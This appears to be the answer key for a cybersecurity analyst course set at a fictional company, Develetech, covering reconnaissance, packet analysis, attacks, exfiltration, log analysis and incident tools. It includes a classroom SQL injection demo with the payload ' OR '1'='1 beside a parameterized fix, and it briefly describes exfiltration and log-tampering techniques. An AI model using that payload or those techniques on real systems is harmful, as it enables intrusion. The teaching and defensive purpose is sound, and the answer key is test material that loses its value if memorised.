A: Answers will vary. Theft is probably the most common intention in this case. An attacker who is able to steal these records can sell them on the black market or to one of Develetech's corporate competitors. PII can be very useful to individuals and organizations looking to gain an advantage over the company or its customers. Similarly, an attacker may be directly spying on Develetech on behalf of one of its competitors to see where its new products are strongest and gain an edge in the marketplace. More personal or idealistic intentions, such as revenge and activism, are less likely; however, depending on the company's actions and its relationship with the public, an attacker may seek to humiliate the company by exposing such a crucial asset to the world.

4. What do you believe are the most likely motives an attacker has for compromising the customer records database?
A: Answers will vary. Assuming theft is the most likely intent, desire for money is the most likely motive. An attacker can make a great deal of money selling PII. However, there are many other possible motives: The attacker could have seen all of the recent data breaches in the news and chosen to make a name for themselves by emulating these breaches; the attacker may destroy the database rather than copy it, demonstrating they have the power to do so; or the attacker may simply breach the database because they wanted to see if they could, and not necessarily to exfiltrate any data.

5. Using what you've determined for the previous questions, what type of threat actor do you think is most likely to carry out a compromise of the customer records database?
A: Answers will vary. It's unlikely that a script kiddie would even be able to breach such a high-profile target. Likewise, there may not be much of a reason why a state-sponsored hacker would go after an electronics manufacturer. More likely, the threat actor is either an insider or cybercriminal. For the former, the threat actor already has significant access to their target, as well as extensive knowledge an external user would not possess. This gives them a key advantage and can make their theft or destruction of the database much easier to achieve. A cybercriminal will likely have the requisite skill to break into the database from the outside, as they have probably made a career out of stealing personal information.

6. Based on your previous decisions, how would you describe the profile of the most likely threat(s) to Develetech's customer records database?
A: Answers will vary depending on the answers to the previous questions, and you may believe that multiple profiles are necessary. One example is as follows: The threat actor is likely an insider—someone with knowledge of the database's structure, physical or logical location, and even its credentials. The insider's motive is most likely a desire for money, as they know this database is very valuable to identity thieves and corporate competitors. Rather than destroy the database or deny service to it, the threat's intention is probably to copy the relevant data and exfiltrate it. The insider may take advantage of the database's poor authentication methods to access it, and may use a code injection exploit to dump the database. The insider is likely somewhat technically proficient if they've gotten to this point, so they will probably try a stealthy approach and remove any traces that they have accessed the database.

ACTIVITY 3-1: Analyzing a Threat Model

2. Can you think of any specific attacks that might fall under the general category of web server attacks?
A: Answers will vary, as there can be many potential attacks on a web server. The diagram provided identifies three: Structured Query Language (SQL) injection attacks, cross-site scripting (XSS) attacks, and file inclusion attacks. Additional attack types include cross-site request forgery (XSRF/CSRF) attacks, directory traversal, and session hijacking.

4. Can you think of any specific countermeasures that might mitigate one or more of these subattacks?
A: Answers will vary, as there can be many countermeasures to these attacks. The diagram provided identifies three: using parameterized queries to mitigate SQL injection; limiting or sanitizing user HTML input to mitigate XSS; and creating whitelists and access identifiers to mitigate file inclusion attacks.

6. What is the value in having this type of visual representation of a threat?
A: Answers may vary, but being able to visualize threats in a tree-like hierarchy can make it easier for security personnel and even non-technical stakeholders to understand the security implications of various technologies and processes that affect the organization. Attack trees are also a useful component of a larger threat modeling strategy.

ACTIVITY 3-2: Performing Reconnaissance on a Network

2. Under HOST DISCOVERY, what option runs a simple ping scan?
A: nmap -sn

3. Under SCAN TECHNIQUES, what option runs a TCP Connect() scan?
A: nmap -sT

4. Under OS DETECTION, what is the option to run an operating system discovery scan?
A: nmap -O

5. Under OUTPUT, what does the -v option mean in Nmap?
A: More verbose responses for more detail in the scan.

9. Why would you generally not wish to do that in a production environment?
A: It generates a lot of traffic and could impact network performance.

11. Which host showed more port numbers active, and why?
A: The server has more port numbers open because it is a general purpose system rather than a focused one like a router.

12. What are some of the open ports on your server? Are any of them out of the ordinary?
A: Answers will vary, but you'll see several ports you should expect to be open, like 53 (DNS) and 389 (LDAP). However, an open port like 22 (SSH) may potentially be used as an attack surface.

ACTIVITY 3-3: Examining Reconnaissance Incidents

2. What were the source and destination IP addresses of this packet?
A: Source = 10.39.5.6 and Destination = 10.39.5.2

4. What was the destination port?
A: 443, commonly used by HTTPS.

5. What flags were set for this packet?
A: SYN (synchronize sequence numbers). A synchronization request is the first packet sent in a TCP session.

8. What did the attacker do?
A: The attacker started a session (SYN), received the server response (SYN-ACK), and then reset it (RST) instead of completing the handshake with an ACK. This is called a stealth scan (also known as a SYN or half-open scan) because the connection is torn down before it is completed: the target application never sees an established connection, so it is less likely to log the probe, which can evade automated detection systems that only watch completed connections.

10. What did the attacker do in this case?
A: The attacker tried to connect using the Telnet protocol (port 23) but was refused by the server.

11. What was the attacker trying to discover from your system in this attack?
A: Which port numbers were open and which were not. In other words, a port scan.

12. How could the attacker proceed after learning this information?
A: The attacker could see what services are running on open ports and try to attack those services.

ACTIVITY 3-4: Capturing and Analyzing Data with Wireshark

3. Are the ones in your capture actually an indication of a problem in this case?
A: Not necessarily. Many are time-exceeded errors that are traceroute's way of determining the routers along the path you specified (in this case, the path to Microsoft's website).

9. After testing it, what filter worked for you?
A: The easiest way to filter for TCP SYN traffic would be by using tcp.flags.syn==1. The filter tcp.flags==0x02 || tcp.flags==0x12 gives nearly the same result: it matches packets whose flags field is exactly SYN (0x02) or SYN-ACK (0x12), so it will miss a SYN that also carries other bits (for example, the ECN bits some hosts set during connection setup), which tcp.flags.syn==1 still catches.

11. Why do some ICMP requests have no answer?
A: This was part of traceroute. Once it got to a firewall, the remaining echo requests were filtered so they had no answering packet.

12. What are the strengths of Wireshark as an analysis tool?
A: Answers will vary, but may include that it sees every packet the interface sees, it has some advanced analysis capability, and the filters enable you to break down the capture by almost any metric.

13. What are some weaknesses of Wireshark for packet analysis?
A: Answers will vary, but may include that it only sees what the interface it's connected to does (which has limited use in a switched network); captures from the GUI can't be scheduled or scripted on their own (Wireshark's command-line companions tshark and dumpcap, or third-party tools, are needed for that); and the program has very little intelligence for detecting suspicious behavior, unlike intrusion detection systems/intrusion prevention systems (IDSs/IPSs).

14. Can Wireshark tell you if certain traffic indicates an attack?
A: No—you must be able to analyze the capture and make that determination.

ACTIVITY 3-5: Assessing the Impact of Social Engineering

6. What could make this attack more difficult for the attacker?
A: Answers may vary. Encouraging employees to use Google's two-factor authentication would help mitigate this type of pharming attack. Also, implementing user policies that discourage clicking unsolicited links could also help prevent the attack from succeeding.

7. What could make this attack more effective?
A: Answers may vary. An attacker may be able to fool the users more easily if the link itself is believable, especially if they're spoofing a major website like Google. Likewise, they may choose to spoof a less well-known site to catch the users off guard. This is especially effective if they've convinced the users they need to enter their credentials for official reasons.

8. What is the most significant weak spot that enables attacks like these to succeed, and what can be done to fix the problem?
A: Answers may vary, but almost always, it's the human factor that is the weakest point in social engineering attacks. Preventing these types of attacks from succeeding requires security awareness training and fostering a cybersecurity culture within the organization.

ACTIVITY 4-1: Assessing the Impact of System Hacking Attacks

4. Do you know anyone who uses one of these passwords?
A: Answers will vary, but most people know at least one person who uses common, insecure passwords like these.

7. What other harm could the attacker do with this access?
A: Answers will vary, but the options are almost limitless—they could delete files, install programs, and download malware for just a few examples.

8. How would you defend against this type of attack?
A: Answers may vary, but the most pressing issue is to enforce a stronger password policy that rejects such a common and simple password, especially for the administrator. You can also limit the number of password attempts, require key-based authentication for SSH instead of passwords, or disable SSH connections entirely.

ACTIVITY 4-2: Assessing the Impact of Web-Based Threats

6. How does the form automatically format the user name and password fields in the query?
A: It adds an opening and closing apostrophe for each field, encasing the field in a string literal.

8. What are some other ways an attacker could compromise the database with SQL injection?
A: Answers may vary, but the attacker could drop entire tables, edit individual row entries, dump the contents of the members table to see more user login information, and even log in as specific users.

9. How would you defend against this type of attack?
A: Answers may vary, but one of the most common and useful tactics to deal with SQL injection is the use of parameterized queries, also known as prepared statements. The quotation marks in the sign-in injection, for example, would be interpreted literally if the query were parameterized.
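As an added example that is not part of the activity or its data files, the following Python script reproduces the two behaviours described in questions 6 and 9 against a throwaway in-memory SQLite database: the sign-in query built the way the form does, with each field wrapped in apostrophes and pasted into the SQL text, next to the same check written as a parameterized query. The members table, the account and the payload are constructed for the demonstration.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory members table with one constructed account (not the course's data file)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO members (username, password) VALUES ('alice', 'S3cret!')")
    conn.commit()
    return conn


def build_vulnerable_query(username: str, password: str) -> str:
    """The sign-in query as the form builds it (question 6): each field is wrapped in
    apostrophes and concatenated into the SQL text, so an apostrophe inside the input
    terminates the string literal and the rest of the input becomes SQL."""
    return ("SELECT id FROM members WHERE username = '" + username
            + "' AND password = '" + password + "'")


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Deliberately vulnerable: executes the concatenated query."""
    return conn.execute(build_vulnerable_query(username, password)).fetchone() is not None


def login_parameterized(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """The same check as a parameterized query (question 9). The SQL text is fixed and the
    values are bound separately, so any apostrophe in the input is compared literally."""
    sql = "SELECT id FROM members WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


# Constructed payload: closes the password literal and appends an always-true condition,
# turning the WHERE clause into  ... AND password = '' OR '1'='1'
PAYLOAD = "' OR '1'='1"

if __name__ == "__main__":
    db = make_db()
    print(build_vulnerable_query("nobody", PAYLOAD))
    print("vulnerable, bad password:  ", login_vulnerable(db, "alice", "wrong"))       # False
    print("vulnerable, payload:       ", login_vulnerable(db, "nobody", PAYLOAD))      # True
    print("parameterized, payload:    ", login_parameterized(db, "nobody", PAYLOAD))   # False
    print("parameterized, real creds: ", login_parameterized(db, "alice", "S3cret!"))  # True
```

The parameterized version still authenticates the real credentials; what changes is that the payload is now compared against the stored password as a plain string and fails, which is exactly the "interpreted literally" behaviour the answer to question 9 describes.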


ACTIVITY 4-3: Assessing the Impact of Malware

2. According to Sophos, why have average ransom payouts been increasing over the past few years?
A: Sophos implies that there is a hierarchy (or weight classes, to use their metaphor) to modern ransomware attacks. Attacks on a few large corporations tend to skew the averages because these corporations can afford to pay a much larger ransom—and attackers know it. Attacks on smaller organizations and individuals are less profitable, so those payouts tend to remain constant.

4. According to Sophos, what is the most common delivery mechanism for ransomware, and why?
A: Windows' Remote Desktop Protocol (RDP) is the most common delivery mechanism for ransomware. Attackers can gain entry into remote computers through RDP just as any user, enabling them to spread the infection much more easily. RDP has become an even more prominent vector in the wake of the COVID-19 pandemic as more people work from home and need to access their computing environments remotely.

6. What categories of malware do security researchers believe will be prominent? What new categories of malware might arise? What new or changing delivery mechanisms and attack vectors might malware take? What other predictions about malware did you discover?
A: Answers will vary greatly depending on the time when the class is taught and what web-based resources you find. Ransomware will likely continue to be prominent well into the future, especially attacks targeting the healthcare industry. Malware may take advantage of artificial intelligence (AI) to better avoid detection and cause more harm. Malware targeting edge devices like those used in IoT and remote work is also likely to grow in prominence.

9. What alert level did Windows Security assign the threat? What category of malware is this file? What does quarantining a file in Windows Security do?
A: Windows Security assigned this threat an alert level of Severe. The file is categorized as a virus (it is actually the harmless EICAR test string, which anti-malware engines deliberately detect as if it were one), and Windows Security automatically placed it in a restricted area where it can't affect the rest of the computer.

11. What value does this EICAR test file have in developing and testing anti-malware systems?
A: Answers will vary. Though it is a bit dated, this is one method of ensuring your tool can detect malware even when it is cloaked (for example, by being inside a ZIP file). You would usually not want to infect your production systems with live malware, so this operates as a substitute.

ACTIVITY 4-4: Assessing the Impact of Hijacking and Impersonation Attacks

5. What is the value to an attacker in doing this?
A: The attacker could use the corrupted ARP caches to set up a man-in-the-middle attack where they capture traffic between each of the workstations and the router (and maybe alter that traffic, if it is unencrypted). They could also use this attack to create a DoS condition.

6. How would you defend against this type of attack?
A: Answers will vary, as there are several mitigation techniques available. A concrete but difficult to manage technique is to write the ARP tables manually and keep them static. For example, you can add only workstations that use a particular file server to the table. Subnetting can also reduce the effectiveness of ARP poisoning, as ARP is not routed between subnets and a poisoning attack therefore stays within the attacker's own broadcast domain. An IDS can also alert security personnel to suspicious ARP traffic, if configured properly. Port security, DHCP snooping, and dynamic ARP inspection can work together to effectively identify and block invalid MAC address entries.

ACTIVITY 4-5: Assessing the Impact of DDoS Incidents

2. Is there any pattern to the attacking IP addresses?

A: No, they seem to be completely random, though there are some with numbers close together.

3. What port number are the attackers targeting?

A: Port 80 (HTTP), to take down a web server.

6. Why do you think some sites go down less than others?

A: Answers may vary, but larger Internet companies like Google and Amazon have massive Internet
connection bandwidth and lots of redundancy so they can absorb a DDoS attack and still stay online.
Others either cannot afford to or do not choose to spend the money to do that.

7. How can you defend an organization against DDoS attacks?

A: Answers may vary, but it is very difficult without simply buying lots of extra bandwidth and/or
redundant Internet connections. You may be able to consult with your ISP if it offers some sort of DDoS
protection services. You can also attempt to delay, but not fully stop, an attack by incorporating network
perimeter defenses like timing out half-open connections and lowering the thresholds at which to drop
certain traffic like ICMP. Ultimately, it's important to have a plan in place in case you need to escalate
your mitigation efforts to a specialist or other third party.

ACTIVITY 4-6: Assessing the Impact of Threats to Mobile Devices

2. Which platform has more known weaknesses?

A: Answers may vary depending on when you check these reports, but when this course was written,
Android had more than twice as many vulnerabilities as iOS. However, iOS vulnerabilities were more
likely to be in the critical score range (9–10). The weighted average CVSS score for iPhone
vulnerabilities was also higher than Android. In past years, the report showed the opposite of these
conclusions, which demonstrates that mobile vulnerabilities fluctuate over time.

4. Why does the Google Play store have so many security apps?

A: Because it is an open platform, many vendors can sell their apps there. Android's openness may also
be more attractive to attackers.


6. What are your recommendations for handling BYOD in Develetech?


A: Answers will vary widely, and may reflect an individual's preconceptions. Android has a wide variety
of security apps designed by trusted vendors, but it tends to be a more widely targeted system. Apple
devices may have fewer vulnerabilities, but what vulnerabilities they do have may be more critical. In
today's world, it's not always feasible to impose hard restrictions on the types of devices that personnel
can use, depending on the industry and corporate culture. So, in many cases, the best approach is to
accept the risk or try to mitigate the risk using indirect methods like training personnel on acceptable
device usage, implementing a robust access control and privilege management program across the
organization, and so on.

ACTIVITY 4-7: Assessing the Impact of Threats to Cloud Infrastructures

1. By migrating from on-premises infrastructure to cloud services, what new security risks or
challenges might Develetech be exposed to?

A: Examples include: hijacking of the entire cloud account or service (for example, an attacker cracks
the password for the management console); insecure public APIs through which an attacker can gain
access to the company's private resources; a malicious insider at the cloud services firm looking to
harm the company or the cloud services firm; as well as the general risks associated with moving to any
web-based service (DoS, password cracking, man-in-the-middle, etc.). One of the fundamental
principles of most cloud services is leveraging economies of scale by sharing a huge pool of storage
and computing resources among many customers. Although there are many benefits to this approach, it
also brings a potential weakness. Any vulnerability in the cloud service that enables a malicious
customer of the cloud service to escape their own sandbox may enable them to access information
resources that belong to other companies. While the likelihood of this risk might be low, its impact can
be quite high, including the loss of valuable or sensitive data, service interruption for clients and the
cloud provider, possible loss of reputation, legal and civil penalties, and compliance violations.

2. What new challenges might Develetech experience in regard to performing forensics?

A: With local infrastructure, forensic investigations can often be accomplished at the physical level with
an analysis of content in specific storage media. With the cloud, forensics becomes much more complex
due to the virtual nature of storage and computing resources. For example, some cloud vendors may
distribute a single user's storage across multiple drives, multiple data centers, or even multiple
geographic regions. Establishing a chain of custody becomes difficult or impossible. As it considers
each cloud service it might adopt, Develetech should model various forensic scenarios to determine if it
will be possible to obtain evidence it needs when it needs it. In some cases, it may be necessary to
build forensic capabilities into the design when customizing cloud services or integrating them into your
own infrastructure.

3. In what ways can attackers use cloud services as a hacking tool?

A: The benefits of cloud services apply to attackers as well as legitimate users. For example, attackers
can use the big data and scalable computing tools provided by cloud services to perform
resource-intensive operations such as password cracking or DDoS attacks. Hosting services can be
used as collection points for data collected by attackers or as distribution points for malware.


ACTIVITY 5-1: Assessing Command and Control Techniques

5. Why might this traffic bypass firewall and intrusion detection system/intrusion prevention system
(IDS/IPS) controls?

A: Since many networks do not block outbound ICMP traffic, this type of C&C communication may
successfully bypass such controls.

6. How might you stop this type of communication?

A: Answers will vary. Blocking outbound ICMP traffic is an option, but it limits your ability to diagnose
network problems through ping and traceroute. Stateful filtering of this traffic will not be useful, as there
is no state to filter. Application-layer firewalls also tend to ignore ICMP. However, packet inspectors may
be able to review ICMP traffic for unusual behavior, such as the messages' length or contents. The fact
that Windows Security identified the bot executable as malicious is promising, but it won't necessarily
detect every possible payload.

7. What other methods of command and control could an attacker use to evade your security?

A: Answers may vary, but should at least include mention of HTTP/S and DNS. These are very difficult
to detect and stop because they blend into normal traffic.
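The length check the answer to question 6 suggests, as an added example that is not part of the course: a shell function that reads tcpdump-style ICMP lines and reports packets whose ICMP length exceeds what ordinary ping traffic produces. The capture lines, addresses and function name are constructed for the example; the threshold is a parameter because the normal size differs by platform (a Linux ping carries 64 bytes, a Windows ping 40).

```shell
#!/bin/sh
# Constructed tcpdump-style ICMP lines (not a real capture). 198.51.100.7 is a
# documentation address standing in for an external host. Two of the packets
# are far larger than a normal echo, which is the kind of anomaly a packet
# inspector would flag when looking for data tunnelled inside ICMP.
ICMP_SAMPLE='08:00:01.000000 IP 10.39.5.20 > 10.39.5.1: ICMP echo request, id 1, seq 1, length 64
08:00:02.000000 IP 10.39.5.1 > 10.39.5.20: ICMP echo reply, id 1, seq 1, length 64
08:00:03.000000 IP 10.39.5.21 > 198.51.100.7: ICMP echo request, id 9, seq 1, length 1024
08:00:04.000000 IP 198.51.100.7 > 10.39.5.21: ICMP echo reply, id 9, seq 1, length 1400
08:00:05.000000 IP 10.39.5.20 > 10.39.5.1: ICMP echo request, id 1, seq 2, length 64'

# flag_oversized_icmp CAPTURETEXT [MAXLEN]
# Prints "<src> <dst> <length>" for every ICMP line whose reported length is
# above MAXLEN (default 128, comfortably above both Linux and Windows pings).
flag_oversized_icmp() {
    max=${2:-128}
    printf '%s\n' "$1" | awk -v max="$max" '
        /ICMP/ {
            # tcpdump prints "length N" as the last two fields; find it by name
            # rather than by position so extra fields do not break the parse.
            for (i = 1; i <= NF; i++)
                if ($i == "length") len = $(i + 1) + 0
            dst = $5; sub(/:$/, "", dst)
            if (len > max) print $3, dst, len
        }'
}

flag_oversized_icmp "$ICMP_SAMPLE"
```

Length is only one of the signals the answer mentions; the same loop could count requests per destination over time, since a tunnel also tends to produce a steady stream of echoes to one external host that a human running ping never would.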

ACTIVITY 5-2: Assessing Persistence Techniques

1. Why might this approach not be 100% effective?

A: Answers may vary, but rootkits infect a device at its lowest levels, including being able to alter the
fundamental behavior of the operating system itself. Therefore you cannot always trust an anti-malware
scan that's running on the operating system to accurately detect a rootkit.

2. From an attacker's perspective, what advantages does using a rogue account for persistent access
have over using backdoors?

A: Answers may vary, but rogue accounts, unlike backdoors, do not require malicious software to be
installed on the target device. There just needs to be an account configured on the device that has the
desired level of access. This helps the attacker evade both manual and automatic anti-malware sweeps.

3. What does the threat profile of a successful APT usually look like?

A: Answers may vary, but APTs are usually launched by multiple experienced cybercriminals,
state-sponsored hackers, or other skilled attackers because of the difficulty in remaining stealthy for
long periods of time. There are many potential motives behind APTs, including a desire for money and
association with a larger group. Likewise, the intent of an APT can vary, though it often centers on theft,
espionage, or denial of service.


ACTIVITY 5-4: Assessing Data Exfiltration

4. What is the flag to download a directory recursively?

A: -r

6. How could an administrator prevent this exfiltration?

A: Answers may vary, but they could disable SSH access on the server, block remote access ports on
the firewall, or implement an IDS/IPS or data loss prevention (DLP) software to monitor sensitive file
movement.

7. What other methods could an attacker use to remove data from the organization?

A: Answers may vary, but could include: physically connecting removable media to the server;
exfiltrating over FTP/S; exfiltrating over HTTP/S, using Netcat as a backdoor to read and write files over
the network; and more.

ACTIVITY 5-5: Assessing Anti-Forensics Techniques

5. What other methods could an attacker use to cover their tracks?

A: Answers may vary, but they could delete individual entries of an event log rather than the entire log.
This may arouse less suspicion, but will typically take more time and finesse to identify each and every
relevant entry. The attacker may also forge log entries rather than delete any of them to misdirect a
forensic analyst.

ACTIVITY 6-1: Conducting a Cybersecurity Audit

6. What are some of the audit failures you encountered?

A: The server should have failed the following audit questions: 1.1, 1.2, 1.3, 2.1, 3.4, and 3.5. Most of
the failures center on the domain password policy and the server's physical security, with one failure in
the local security policy.

7. How might you communicate these audit results to a manager or other decision maker?

A: Answers may vary, but you can tell your audience the server is failing to meet the password
requirements set out by company policy, and that these issues should be corrected in the domain policy
and then pushed out across the domain. You can also suggest that Microsoft accounts be explicitly
prevented from logging on to the server to correct the one local security policy failure. From a physical
security standpoint, although being able to move the server around is more convenient, the
administrators should securely fasten the server to the shelf or some other surface to prevent it from
being carried out. If they need to make room for new equipment, they should better plan where to place
existing equipment and the new equipment. Lastly, you should suggest that the company install
automatic lights so the lights turn on when administrators enter the room and turn off when they exit.
That way, passersby can't see into the room when no one's around.


ACTIVITY 6-2: Implementing a Vulnerability Management Plan

3. According to these requirements, what are some of the behaviors that Develetech must incorporate
into its vulnerability management program?

A: Answers may vary, as there are several requirements that PCI DSS outlines for the organization.
Some examples include: the organization must scan for all wireless access points (WAPs) in its
environments at least once every three months; the organization must run a vulnerability scan after a
significant change to its network (e.g., its topology changes); the organization must allow an external
vulnerability assessment agency validated by PCI DSS to scan environments every three months; the
organization must have a monitoring process in place for detecting changes to critical files; and more.

4. How could the nature of this cloud platform business inhibit Develetech from remediating this
problem?

A: Answers may vary, but Develetech needs to consider the impact of putting the security patch in
place. If the company simply propagates the fix to all production environments at once, there will likely
be processing and networking bottlenecks that cause delays or may even lead to a disruption of
service. If this is in direct violation of the SLA, Develetech may be subject to legal action. The
vulnerability management plan needs to account for the impacts of remediation with regard to the
company's various business arrangements.

5. What factors influence your decision to conduct these two scans at different frequencies?

A: Answers may vary. The comprehensive vulnerability scan is likely to be a bigger drain on network and
computing resources, so it wouldn't necessarily be feasible to conduct this scan every day. On the other
hand, the port scan is less disruptive, so it makes more sense to conduct it more frequently. Time is
also a factor—the comprehensive scan could take several hours, or even days, while the port scan may
take just a few minutes. Another factor to consider is employee workflow. Starting the comprehensive
scan in the middle of a weekday is not the best choice, as the chance of interrupting business is at its
highest. Performing either scan after business hours or on the weekend is usually the best approach.

ACTIVITY 6-3: Conducting Vulnerability Scans

6. When you fix the major vulnerabilities in a system, how can you ensure they are repaired?

A: You can rerun the GSA scan and see if the vulnerabilities persist.

7. Why would you not always be able to fix a vulnerability that GSA marks as critical?

A: Answers may vary, but some vulnerabilities require software patching to fix them, and the
organization may not be able to update certain software. Some services may also be marked as critical
vulnerabilities by GSA, but must be enabled on the host for a variety of reasons.


8. What kind of vulnerability is GSA unable to find?

A: Answers may vary, but GSA cannot discover policy or social engineering vulnerabilities.

9. How can a vulnerability scan like this be useful to a penetration test?

A: Answers may vary, but being able to identify general weak points in an organization can help a
penetration tester focus their efforts on systems most likely to be insecure. The penetration tester can
actively exploit the vulnerabilities identified by GSA, demonstrating the impact of an attack if it is not
prevented.

ACTIVITY 6-4: Conducting Penetration Testing on Network Assets

7. How would you defend against this attack?

A: Answers will vary, but might include: use an intrusion detection system (IDS)/intrusion prevention
system (IPS), use two-factor authentication for administrator accounts, limit the number of administrator
accounts, and ensure strong passwords.

8. What other tools would work well with the Metasploit Framework in a penetration testing
environment?

A: Answers might include vulnerability scanners such as Nessus, Rapid7, and so on; password crackers
like John the Ripper, Cain & Abel, Ncrack, and L0phtCrack; and Nmap and other port scanners.

ACTIVITY 7-1: Deploying a Security Intelligence Collection and Analysis Platform

1. What are the advantages of CSM that could convince management to offer their financial backing?

A: Answers may vary, but with CSM, the organization is able to constantly survey all of its assets for any
behavior that induces risk. Data collected on this behavior is both up to date and actionable; problems
are detected immediately, and can likewise be contained as quickly as possible to minimize damage.
These CSM systems can also be configured and customized to suit the organization's needs, even as
business operations or the threat landscape change. Ultimately, a CSM can drastically reduce the risk
of an attack going unidentified for a long period of time due to stagnant collection processes.

2. What steps would you take to determine which sources to choose for data collection?

A: Answers may vary, but the organization should first identify the major risks it faces. The risk
assessment team then needs to prioritize those risks by measuring the most likely risks against the risks
that will cause the most damage. This will enable the intelligence collection team to focus on data that is
most relevant to mitigating those risks. The collection team will review these relevant data sources for
components like alerts, logs, captures, etc., that can provide insight into the risk. Lastly, the collection
team will narrow their focus to the most actionable data, and attempt to eliminate redundant data or
data that does not provide optimal value.


3. When it comes to processing disparate types of data, what challenges will the collection and
analysis platform face?

A: Answers may vary. Log files come in many different formats based on different standards—or
sometimes, no standards at all. Log files can be generated in CSV format, syslog format, XML, and
much more. Some formats are open source and easy to work with, whereas some are proprietary and
require specific software. Logs may also be encoded using different schemes, such as ANSI versus
Unicode. The time-keeping element of an appliance may not be synchronized with other appliances,
making it difficult to correlate data based on a time factor.

ACTIVITY 7-2: Collecting Network-Based Security Intelligence

3. How many TCP packets did Snort examine?

A: Answers will vary, but the number will be large, typically in the thousands.

4. Why do you think there were only five instances of each alert in the traffic?

A: The limits placed in the rules file show only the first five instances of each alert within a 30-minute
period.

5. Why limit the number of alerts?

A: To not overwhelm your IDS with traffic and fill your logs with just a few loud attacks like this one.

6. When might you want to temporarily see every instance of an alert?

A: For analysis purposes once you know an attack is coming.

8. Were all of the XMAS scans identical? If not, how were they different?

A: No, some have just FIN, PSH, and URG, while the others include the SYN flag. Three of them are
marked by Wireshark as retransmissions.

10. How is the output in the command prompt different?

A: There are many more alerts. So many that it constantly scrolls.

12. Is the number of TCP packets (or other statistics) significantly different from the previous scan?

A: No, the numbers are about the same. Snort just alerted on more of the malicious traffic than before.

13. Why is it important to carefully tune and limit your IDS rules in a production environment?

A: To limit the number of alerts that are logged for the same attack and make sure that actual attacks
do not get lost in false positives. Storage space can also be a concern if a great deal of data is logged
over a period of time.


ACTIVITY 7-3: Collecting Host-Based Security Intelligence

4. Looking at the remote logon event list, can you tell what caused these events?

A: Several of these remote logon events were created when you remotely accessed the server using
the Metasploit PsExec exploit during the penetration test activity.

5. What is the value of this tool beyond using Event Viewer alone?

A: Answers will vary. Log Parser can combine multiple logs, even from different devices. It also
automates many of the queries you would otherwise have to do by hand.

ACTIVITY 8-1: Analyzing Linux Logs for Security Intelligence

3. How would you use grep to look for a negative match for a pattern rather than a positive match?

A: The -v flag does a negative match.

5. What other useful delimiters are there?

A: Answers will vary, but major delimiters include space, tab, period, and comma.

7. How would you identify warnings in this log?

A: Answers may vary, but it would be something like sudo grep -i "warning" syslog.1 | cut -d ":" -f1-3

ACTIVITY 8-2: Incorporating SIEMs into Security Intelligence Analysis

4. Is there any evidence of the SSH password attack you ran in the "Analyzing Attacks on Computing
and Network Environments" lesson?

A: Yes, Splunk should show many password failures (hundreds) depending on what experimentation
you may have done.

5. Despite the fact that you covered your tracks in the "Analyzing Post-Attack Techniques" lesson, why
do log entries concerning SSH still appear?

A: There are two reasons. The most obvious is that you used SSH after you cleared the Application log,
so any of that activity would be logged. However, there are still SSH logs from the cracking attempt in
the "Analyzing Attacks on Computing and Network Environments" lesson, as mentioned in the previous
question. This is because some SSH activity is also sent to the Security log, which you likely didn't
clear. Remember, you performed online dictionary cracking using Ncrack; it tried and failed to connect
using many different passwords before it successfully connected with the correct password.

6. How would you look specifically for SSH password failures for the Administrator account that came
from Kali Linux?

A: Answers may vary, but using the search query sshd pass* fail* admin* 10.39.5.# where # is the last
octet of your Kali Linux IP address will work.
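The grep and cut answers from Activity 8-1 and the Splunk search from question 6 above, worked through on a small log, as an added example that is not part of the course materials. The syslog excerpt below is constructed (the host name, timestamps and addresses are made up, with 10.39.5.50 standing in for the Kali Linux host), and the function names are the example's own. It shows why `cut -d ":" -f1-3` yields the timestamp, host and process, how `-v` inverts a match, and how the same SSH-failure question can be answered on the server itself when no SIEM is available.

```shell
#!/bin/sh
# Constructed syslog excerpt; not taken from the course VM.
SYSLOG_SAMPLE='Dec  3 08:12:01 devsrv sshd[1201]: Failed password for Administrator from 10.39.5.50 port 51234 ssh2
Dec  3 08:12:03 devsrv sshd[1201]: Failed password for Administrator from 10.39.5.50 port 51235 ssh2
Dec  3 08:12:05 devsrv kernel: [12345.678] WARNING: CPU temperature above threshold
Dec  3 08:12:09 devsrv sshd[1205]: Failed password for backup from 10.39.5.77 port 40010 ssh2
Dec  3 08:13:10 devsrv systemd[1]: warning: unit report.service failed to start
Dec  3 08:14:00 devsrv sshd[1210]: Accepted password for Administrator from 10.39.5.50 port 51240 ssh2'

# Equivalent of the activity's  grep -i "warning" syslog.1 | cut -d ":" -f1-3
# Because the timestamp itself contains two colons, colon-separated fields 1-3
# cover the timestamp, host and logging process, which is a compact summary.
find_warnings() {
    printf '%s\n' "$SYSLOG_SAMPLE" | grep -i "warning" | cut -d ":" -f1-3
}

# Negative match with -v: every line that is NOT from sshd.
non_ssh_lines() {
    printf '%s\n' "$SYSLOG_SAMPLE" | grep -v "sshd"
}

# ssh_failures_from ACCOUNT IP
# Shell counterpart of the Splunk search  sshd pass* fail* admin* 10.39.5.#
# Counts sshd password failures for ACCOUNT (case-insensitive prefix, so
# "admin" matches "Administrator") coming from exactly IP.
ssh_failures_from() {
    printf '%s\n' "$SYSLOG_SAMPLE" \
        | grep "sshd" | grep -i "password" | grep -i "fail" \
        | grep -i "for $1" | grep -F "from $2 " \
        | wc -l | tr -d ' '
}

find_warnings
ssh_failures_from admin 10.39.5.50
```

The trailing space in `"from $2 "` matters: without it, a search for 10.39.5.5 would also count failures from 10.39.5.50, which is the same prefix-matching trap the wildcard in the Splunk query can fall into.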


8. What other sources of data would you load into Splunk in the Develetech network?

A: Answers will vary, but should include firewall logs, intrusion detection system (IDS) logs, web server
logs, and logs from other critical systems.

9. How does a system like this aid security management?

A: Answers will vary, but could include: it pulls all logs into one place for analysis and enables the
massaging of data and reconstruction of events for incidents.

ACTIVITY 9-1: Analyzing Incidents with Windows-Based Tools

2. How would you renew a Dynamic Host Configuration Protocol (DHCP) lease on your Ethernet
adapter?

A: ipconfig /renew Ethernet

4. What is the default gateway for your Ethernet adapter?

A: 10.39.5.1

5. What is the DNS address for your Ethernet adapter?

A: 10.39.5.#, where # is the student's Windows Server IP address.

8. What do the -a and -b flags do in netstat?

A: The -a flag shows all connections and listening ports, and the -b flag shows the executables
associated with each connection.

10. What does the status show for that connection?

A: ESTABLISHED

